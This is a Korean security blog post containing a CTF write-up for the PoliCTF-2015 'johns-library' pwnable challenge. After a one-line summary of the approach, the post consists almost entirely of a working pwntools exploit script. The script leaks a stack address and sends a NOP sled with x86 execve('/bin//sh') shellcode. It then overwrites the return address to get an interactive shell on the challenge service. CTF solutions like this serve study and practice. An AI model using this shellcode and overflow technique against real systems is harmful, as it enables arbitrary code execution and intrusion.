cdor1's lab
PoliCTF-2015 johns-library 본문
후기 : esp leak을 이용해 스택 주소를 알고 그곳에 쉘코드를 첨부함으로써 쉘을 얻어냈다.
from pwn import *
s = remote('localhost', 4000)
def read(index):
print s.recvuntil('u - exit')
s.sendline('r')
print s.recvuntil('read: ')
s.sendline(str(index))
def add(title, data):
print s.recvuntil('u - exit')
s.sendline('a')
print s.recvuntil('title:')
s.sendline(str(title))
s.sendline(data)
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'
add(-28, 'A')
read(1)
ret = u32(s.recv(4))
log.info('ret : ' + hex(ret))
payload = '\x90'*300
payload += shellcode
payload += '\x90'*740
payload += p32(ret)
add(1, payload)
print s.recvuntil('u - exit')
s.sendline('u')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| SECCON 2016 shopping (0) | 2017.01.17 |
|---|---|
| SECUINSIDE Quals 2016 noted (0) | 2017.01.17 |
| H3X0R CTF comment (0) | 2017.01.13 |
| H3X0R CTF ezheap (0) | 2017.01.12 |
| BoB CTF casino (0) | 2017.01.12 |
Comments